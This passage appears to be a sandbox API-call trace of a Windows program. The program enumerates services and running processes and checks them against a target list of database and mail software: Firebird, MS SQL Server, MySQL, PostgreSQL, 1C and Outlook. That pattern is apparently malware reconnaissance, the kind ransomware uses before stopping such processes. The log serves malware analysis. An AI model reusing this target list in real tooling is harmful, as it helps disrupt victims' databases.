(lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0046.156] lstrlenW (lpString="DcomLaunch") returned 10 [0046.156] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0046.156] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0046.156] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0046.156] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0046.156] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0046.156] lstrlenW (lpString="Dhcp") returned 4 [0046.156] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0046.156] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0046.157] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0046.157] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0046.157] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0046.157] lstrlenW (lpString="Dnscache") returned 8 [0046.157] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0046.157] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0046.157] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0046.157] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0046.157] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0046.157] lstrlenW (lpString="DPS") returned 3 [0046.157] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0046.157] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0046.157] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0046.157] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0046.157] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0046.157] lstrlenW (lpString="eventlog") returned 8 [0046.157] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0046.157] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0046.157] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0046.157] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0046.157] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0046.157] lstrlenW (lpString="EventSystem") returned 11 [0046.157] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0046.157] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0046.157] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0046.157] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0046.157] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0046.157] lstrlenW (lpString="gpsvc") returned 5 [0046.157] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0046.158] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0046.158] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0046.158] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0046.158] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0046.158] lstrlenW (lpString="iphlpsvc") returned 8 [0046.158] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0046.158] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0046.158] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0046.158] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0046.158] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0046.158] lstrlenW (lpString="LanmanServer") returned 12 [0046.158] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0046.158] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0046.158] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0046.158] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0046.158] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0046.158] lstrlenW (lpString="LanmanWorkstation") returned 17 [0046.158] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0046.158] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0046.158] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0046.158] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0046.158] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0046.158] lstrlenW (lpString="lmhosts") returned 7 [0046.158] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0046.158] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0046.158] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0046.158] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0046.158] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0046.158] lstrlenW (lpString="MMCSS") returned 5 [0046.158] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0046.158] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0046.159] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0046.159] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0046.159] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0046.159] lstrlenW (lpString="MpsSvc") returned 6 [0046.159] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0046.159] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0046.159] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0046.159] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0046.159] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0046.159] lstrlenW (lpString="Netman") returned 6 [0046.159] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0046.159] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0046.159] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0046.159] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0046.159] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0046.159] lstrlenW (lpString="netprofm") returned 8 [0046.159] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0046.159] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0046.159] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0046.159] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0046.159] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0046.159] lstrlenW (lpString="NlaSvc") returned 6 [0046.159] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0046.159] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0046.159] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0046.159] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0046.159] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0046.159] lstrlenW (lpString="nsi") returned 3 [0046.159] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0046.160] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0046.160] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0046.160] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0046.160] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0046.160] lstrlenW (lpString="PcaSvc") returned 6 [0046.160] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0046.160] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0046.160] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0046.160] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0046.160] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0046.160] lstrlenW (lpString="PlugPlay") returned 8 [0046.160] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0046.160] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0046.160] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0046.160] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0046.160] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0046.160] lstrlenW (lpString="Power") returned 5 [0046.160] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0046.160] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0046.160] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0046.160] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0046.160] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0046.160] lstrlenW (lpString="ProfSvc") returned 7 [0046.160] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0046.160] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0046.160] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0046.160] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0046.160] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0046.161] lstrlenW (lpString="RpcEptMapper") returned 12 [0046.161] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0046.161] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0046.161] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0046.161] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0046.161] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0046.161] lstrlenW (lpString="RpcSs") returned 5 [0046.161] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0046.161] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0046.161] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0046.161] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0046.161] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0046.161] lstrlenW (lpString="SamSs") returned 5 [0046.161] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0046.161] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0046.161] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0046.161] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0046.161] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0046.161] lstrlenW (lpString="Schedule") returned 8 [0046.161] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0046.161] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0046.161] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0046.161] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0046.161] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0046.161] lstrlenW (lpString="SENS") returned 4 [0046.161] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0046.161] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0046.161] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0046.161] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0046.161] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0046.161] lstrlenW (lpString="ShellHWDetection") returned 16 [0046.161] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0046.161] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0046.161] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0046.162] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0046.162] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0046.162] lstrlenW (lpString="Spooler") returned 7 [0046.162] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0046.162] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0046.162] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0046.162] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0046.162] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0046.162] lstrlenW (lpString="swprv") returned 5 [0046.162] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0046.162] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0046.162] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0046.162] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0046.162] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0046.162] lstrlenW (lpString="SysMain") returned 7 [0046.162] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0046.162] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0046.162] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0046.162] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0046.162] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0046.162] lstrlenW (lpString="Themes") returned 6 [0046.162] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0046.162] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0046.162] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0046.162] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0046.162] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0046.162] lstrlenW (lpString="TrkWks") returned 6 [0046.162] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0046.162] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0046.162] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0046.163] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0046.163] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0046.163] lstrlenW (lpString="UxSms") returned 5 [0046.163] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0046.163] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0046.163] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0046.163] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0046.163] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0046.163] lstrlenW (lpString="VSS") returned 3 [0046.163] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0046.163] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0046.163] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0046.163] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0046.163] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0046.163] lstrlenW (lpString="WdiServiceHost") returned 14 [0046.163] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0046.163] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0046.163] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0046.163] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0046.163] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0046.163] lstrlenW (lpString="WdiSystemHost") returned 13 [0046.163] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0046.163] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0046.163] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0046.163] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0046.163] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0046.163] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0046.163] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0046.164] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0046.164] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0046.164] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0046.164] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0046.164] lstrlenW (lpString="Winmgmt") returned 7 [0046.164] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0046.164] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0046.164] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0046.164] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0046.164] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0046.164] lstrlenW (lpString="WPDBusEnum") returned 10 [0046.164] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0046.164] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0046.164] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0046.164] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0046.164] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0046.164] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3943b50 | out: hHeap=0x600000) returned 1 [0046.164] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218 [0046.166] Process32FirstW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0046.167] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0046.167] lstrlenW (lpString="System") returned 6 [0046.167] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0046.167] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0046.167] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0046.167] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0046.168] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0046.168] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0046.168] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0046.168] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0046.168] lstrlenW (lpString="smss.exe") returned 8 [0046.168] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0046.168] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0046.168] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0046.168] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0046.168] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0046.168] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0046.168] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0046.168] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0046.169] lstrlenW (lpString="csrss.exe") returned 9 [0046.169] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0046.169] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0046.169] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0046.169] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0046.169] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0046.169] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0046.169] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0046.169] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0046.170] lstrlenW (lpString="wininit.exe") returned 11 [0046.170] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0046.170] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0046.170] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0046.170] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0046.171] lstrlenW (lpString="csrss.exe") returned 9 [0046.171] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0046.172] lstrlenW (lpString="winlogon.exe") returned 12 [0046.172] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0046.173] lstrlenW (lpString="services.exe") returned 12 [0046.173] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0046.174] lstrlenW (lpString="lsass.exe") returned 9 [0046.174] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0046.174] lstrlenW (lpString="lsm.exe") returned 7 [0046.174] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.175] lstrlenW (lpString="svchost.exe") returned 11 [0046.175] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.175] lstrlenW (lpString="svchost.exe") returned 11 [0046.176] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.176] lstrlenW (lpString="svchost.exe") returned 11 [0046.176] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.177] lstrlenW (lpString="svchost.exe") returned 11 [0046.177] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.177] lstrlenW (lpString="svchost.exe") returned 11 [0046.177] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0046.178] lstrlenW (lpString="audiodg.exe") returned 11 [0046.178] Process32NextW (in: hSnapshot=0x218, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 